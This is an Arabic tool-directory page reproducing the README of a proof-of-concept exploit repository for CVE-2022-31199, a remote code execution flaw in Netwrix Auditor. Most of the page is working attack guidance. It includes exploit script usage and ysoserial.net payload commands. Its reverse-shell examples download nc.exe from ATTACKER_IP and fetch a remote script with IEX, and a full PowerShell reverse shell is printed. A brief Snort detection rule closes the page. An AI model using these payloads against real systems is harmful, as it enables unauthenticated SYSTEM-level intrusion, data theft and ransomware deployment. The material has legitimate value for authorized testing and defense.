Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-31199 — إثباتات مفهوم لاستغلال CVE-2022-31199، وهي ثغرة حرجة في إلغاء تسلسل .NET تتيح تنفيذ الأكواد عن بُعد (RCE) في Netwrix Auditor. تتضمن نصوصًا برمجية بلغة Python وPowerShell، وتوليد الحمولات باستخدام ysoserial.net، وتوقيعات كشف للاختبارات الأمنية المصرح بها. | Kitploit
أدوات/GitHubGitHub/developerfred/cve-2022-31199
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمرتطوير الحمولاتمختبرات وتدريب عملي
GitHub
developerfred/cve-2022-31199

CVE-2022-31199

إثباتات مفهوم لاستغلال CVE-2022-31199، وهي ثغرة حرجة في إلغاء تسلسل .NET تتيح تنفيذ الأكواد عن بُعد (RCE) في Netwrix Auditor. تتضمن نصوصًا برمجية بلغة Python وPowerShell، وتوليد الحمولات باستخدام ysoserial.net، وتوقيعات كشف للاختبارات الأمنية المصرح بها.

عرض المستودع
13منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-31199 - استغلالات إثبات المفهوم RCE في Netwrix Auditor

🔍 نظرة عامة على الثغرة

CVE-2022-31199 هي ثغرة حرجة في إلغاء تسلسل الكائنات غير الآمن في Netwrix Auditor قبل الإصدار 10.5. توجد الثغرة في خدمة .NET Remoting غير مؤمّنة تستمع على منفذ TCP 9004، مما يسمح للمهاجمين عن بُعد غير المصادق عليهم بتنفيذ تعليمات برمجية عشوائية بصلاحيات NT AUTHORITY\SYSTEM.

تفاصيل الثغرة

  • معرف CVE: CVE-2022-31199
  • درجة CVSS: 9.8 (حرجة)
  • CWE: CWE-502 (إلغاء تسلسل البيانات غير الموثوقة)
  • الإصدارات المتأثرة: Netwrix Auditor < 10.5
  • متجه الهجوم: الشبكة (بدون مصادقة)
  • الصلاحيات المطلوبة: لا شيء
  • التأثير: اختراق كامل للنظام بصلاحيات SYSTEM
  • CISA KEV: مُدرجة في كتالوج الثغرات المستغلة المعروفة

التأثير في العالم الحقيقي

تم استغلال هذه الثغرة بنشاط في البرية من قبل:

  • حملة البرمجية الخبيثة Truebot (مشغلو برامج الفدية CL0P/TA505 المرتبطون بروسيا)
  • مجموعة Silence للإجرام السيبراني
  • الجهات الفاعلة للتهديد FIN11

الاستغلال الناجح يؤدي عادةً إلى:

  • اختراق كامل لمجال Active Directory
  • تنقّل جانبي عبر الأنظمة المراقبة
  • سرقة البيانات
  • نشر برامج الفدية

📦 محتويات المستودع

يحتوي هذا المستودع على استغلالات كاملة لإثبات المفهوم (POC) لثغرة CVE-2022-31199:

الملفات

  1. exploit.py - إطار استغلال مبني على Python
  2. exploit.ps1 - سكربت استغلال PowerShell
  3. README.md - هذه الوثائق
  4. manual-exploitation.md - دليل استغلال يدوي خطوة بخطوة

🛠️ المتطلبات

الأدوات المطلوبة

الاستغلال عبر ويندوز (موصى به)

  • ysoserial.net - مولّد حمولات إلغاء التسلسل .NET

    • التحميل: https://github.com/pwntester/ysoserial.net
    • الإصدارات: https://github.com/pwntester/ysoserial.net/releases
  • ExploitRemotingService - أداة استغلال .NET Remoting

    • التحميل: https://github.com/tyranid/ExploitRemotingService
    • بديل (مُحسّن): https://github.com/codewhitesec/ExploitRemotingService

متطلبات سكربت Python

  • بايثون 3.6 أو أحدث
  • المكتبة القياسية فقط (بدون تبعيات خارجية للفحوصات الأساسية)
  • الوصول إلى ملفات ysoserial.net و ExploitRemotingService التنفيذية

متطلبات سكربت PowerShell

  • بوويرشيل 5.1 أو أحدث
  • نظام تشغيل ويندوز
  • وجود ysoserial.exe و ExploitRemotingService.exe في دليل السكربت

🚀 بدء سريع

1. تحقق مما إذا كان الهدف معرّضًا للثغرة

باستخدام Python:

python3 exploit.py --target 192.168.1.100 --check

باستخدام PowerShell:

.\exploit.ps1 -Target 192.168.1.100 -CheckOnly

2. توليد الحمولة

# Using ysoserial.net
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "whoami"

3. تنفيذ الاستغلال

Python (مع حمولة مولّدة مسبقًا):

python3 exploit.py --target 192.168.1.100 --payload [BASE64_PAYLOAD]

PowerShell (تلقائي):

.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"

📖 الاستخدام التفصيلي

استغلال Python (exploit.py)

فحص الثغرة الأساسي

python3 exploit.py --target 10.10.10.100 --check

استغلال كامل بحمولة مخصصة

# Step 1: Generate payload
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c whoami > C:\temp\output.txt"

# Step 2: Execute exploit
python3 exploit.py --target 10.10.10.100 --payload AAEAAAD....[base64_payload]

خيارات متقدمة

# Custom port
python3 exploit.py --target 10.10.10.100 --port 9004 --check

# Custom endpoint
python3 exploit.py --target 10.10.10.100 --endpoint UAVRServer --check

وسائط سطر الأوامر

--target    : Target IP address or hostname (required)
--port      : Target port (default: 9004)
--endpoint  : .NET Remoting endpoint name (default: UAVRServer)
--check     : Only check vulnerability, don't exploit
--payload   : Base64 encoded payload from ysoserial.net

استغلال PowerShell (exploit.ps1)

فحص الثغرة فقط

.\exploit.ps1 -Target 192.168.1.100 -CheckOnly

تنفيذ أمر

# Simple command execution
.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"

# Write output to file
.\exploit.ps1 -Target 192.168.1.100 -Command "cmd /c whoami > C:\temp\out.txt"

# Custom port
.\exploit.ps1 -Target 192.168.1.100 -Port 9004 -Command "hostname"

المعاملات

-Target     : Target IP address or hostname (required)
-Port       : Target port (default: 9004)
-Command    : Command to execute on target (default: "whoami")
-CheckOnly  : Only check vulnerability, don't exploit

🎯 أمثلة على الاستغلال

المثال 1: جمع المعلومات

# Check system information
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c systeminfo > C:\temp\sysinfo.txt"

المثال 2: قشرة عكسية

إعداد المستمع:

nc -lvnp 4444

توليد الحمولة:

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c curl http://ATTACKER_IP/nc.exe -o C:\temp\nc.exe; C:\temp\nc.exe ATTACKER_IP 4444 -e cmd.exe"

المثال 3: قشرة عكسية عبر PowerShell

إنشاء سكربت القشرة العكسية (rev.ps1):

$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

استضافة السكربت:

python3 -m http.server 8000

توليد الحمولة:

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8000/rev.ps1')"

المثال 4: استخدام ExploitRemotingService مباشرة

# Test connectivity
ExploitRemotingService.exe tcp://192.168.1.100:9004/UAVRServer ver

# Execute with lease mode (bypasses some protections)
ExploitRemotingService.exe -uselease tcp://192.168.1.100:9004/UAVRServer ls C:\

# Execute with object reference
ExploitRemotingService.exe -useobjref tcp://192.168.1.100:9004/UAVRServer exec "whoami"

🔬 التفاصيل التقنية

السبب الجذري للثغرة

تنبع الثغرة من:

  1. نقطة نهاية .NET Remoting غير مؤمّنة على منفذ TCP 9004
  2. إلغاء تسلسل BinaryFormatter دون تصفية أنواع مناسبة
  3. خدمة UAVRServer تقبل كائنات متسلسلة عشوائية
  4. الخدمة تعمل بصلاحيات SYSTEM في عمليات النشر النموذجية

عملية الاستغلال

1. Attacker connects to TCP port 9004
2. Identifies .NET Remoting service (UAVRServer endpoint)
3. Generates malicious serialized payload using ysoserial.net
4. Sends payload via .NET Remoting protocol
5. Target deserializes object using BinaryFormatter
6. Gadget chain executes arbitrary code
7. Code runs with NT AUTHORITY\SYSTEM privileges

سلاسل الأدوات المدعومة (Gadget Chains)

تعمل أدوات ysoserial.net التالية ضد هذه الثغرة:

  • TypeConfuseDelegate (موصى بها)
  • ObjectDataProvider
  • PSObject
  • WindowsIdentity
  • TextFormattingRunProperties

بروتوكول الشبكة

.NET Remoting Protocol Structure:
┌─────────────────────────────────────┐
│ Preamble (8 bytes)                  │
│ 0x00 0x01 0x00 0x00 0x01 0x00 0x00 │
├─────────────────────────────────────┤
│ Headers                             │
├─────────────────────────────────────┤
│ URI (UAVRServer)                    │
├─────────────────────────────────────┤
│ Serialized Object (BinaryFormatter) │
└─────────────────────────────────────┘

🛡️ الاكتشاف

مؤشرات الشبكة

قاعدة Snort/Suricata

alert tcp any any -> any 9004 (
    msg:"CVE-2022-31199 Netwrix .NET Remoting Exploit Attempt"; 
    content:"|00 01 00 00 01 00 00 00|"; 
    depth:8; 
    content:"System.Runtime.Remoting"; 
    distance:0; 
    sid:1000001; 
    rev:1;
)
تنزيل الأداة